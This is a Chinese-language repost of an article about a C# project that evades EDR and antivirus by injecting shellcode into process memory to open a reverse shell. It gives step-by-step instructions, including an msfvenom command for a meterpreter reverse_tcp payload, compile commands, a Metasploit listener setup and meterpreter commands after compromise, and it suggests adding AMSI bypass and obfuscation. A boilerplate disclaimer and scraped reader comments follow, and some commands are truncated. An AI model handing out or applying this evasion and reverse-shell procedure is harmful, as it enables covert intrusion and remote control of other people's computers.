您现在的位置是:首页 > 编程 > 

【神兵利器】绕过EDR防病毒软件

2025-07-27 19:33:04
【神兵利器】绕过EDR防病毒软件 项目介绍项目演示了使用Windows API函数(例如:VirtualAlloc、CreateThread和WaitForSingleObject)绕过EDR和防病毒保护,有效负载被直接注入到进程内存中而不被安全工具检测到,从而为反向shell建立到远程系统的连接项目优点绕过标准的EDR和防病毒解决方案在内存中执行shell代码以创建反向shell利用Virtua

【神兵利器】绕过EDR防病毒软件

项目介绍

项目演示了使用Windows API函数(例如:VirtualAlloc、CreateThread和WaitForSingleObject)绕过EDR和防病毒保护,有效负载被直接注入到进程内存中而不被安全工具检测到,从而为反向shell建立到远程系统的连接

项目优点

  • 绕过标准的EDR和防病毒解决方案
  • 在内存中执行shell代码以创建反向shell
  • 利用VirtualAlloc和CreateThread将有效负载直接注入进程内存

环境需求

  • Windows操作系统 ( Windows 11 Pro)
  • Kali Linux (反弹shell监听)
  • Visual Studio or any C# compiler

项目使用

Step 1:修改shellcode:

在编译之前需要修改shell代码以指向您自己的反向外壳的IP地址和端口,您可以使用msfvenom生成shellcode:

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp

用刚才生成的shellcode替换中的byte[] buf部分。

Step 2:编译代码

在Visual Studio中打开该项目或者使用以下命令

代码语言:javascript代码运行次数:0运行复制
csc 

您也可以在Release模式下编译以获得更好的优化

代码语言:javascript代码运行次数:0运行复制
csc -optimize 

Step :开启监听

在您的Kali Linux机器上启动一个来捕获反向shell,在Metasploit中使用以下命令:

代码语言:javascript代码运行次数:0运行复制
msfcole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT <YOUR_PORT>
run

Step 4:执行shellcode

传输编译好的exe文件复制到Windows计算机上,您可以手动执行该文件也可以使用任何其他方法来运行该文件:

代码语言:javascript代码运行次数:0运行复制

Step 5:获取shell

在目标机器上执行有效负载后您应该会在Metasploit控制台中看到一个反向shell会话

代码语言:javascript代码运行次数:0运行复制
meterpreter > sysinfo
meterpreter > shell

Step 6:其他绕过技术

为了避免被高级EDR解决方案检测到,可以考虑使用进程注入、模糊处理或AMSI旁路等技术,这个PoC可以用这些方法来扩展,以实现更鲁棒的规避

免责声明

仅限用于技术研究和获得正式授权的攻防项目,请使用者遵守《中华人民共和国网络安全法》,切勿用于任何非法活动,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律连带责任

本文参与 腾讯云自媒体同步曝光计划,分享自。原始发表:2025-01-02,如有侵权请联系 cloudcommunity@tencent 删除解决方案进程内存软件编译

#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格

本文地址:http://www.dnpztj.cn/biancheng/1193458.html

相关标签:无
上传时间: 2025-07-23 02:40:52
留言与评论(共有 5 条评论)
本站网友 疯狂的投资
19分钟前 发表
有效负载被直接注入到进程内存中而不被安全工具检测到
本站网友 石菖蒲的功效与作用
0秒前 发表
您可以使用msfvenom生成shellcode:代码语言:javascript代码运行次数:0运行复制msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp用刚才生成的shellcode替换中的byte[] buf部分
本站网友 麦粒肿早期图片
17分钟前 发表
原始发表:2025-01-02
本站网友 壹码
13分钟前 发表
您可以手动执行该文件也可以使用任何其他方法来运行该文件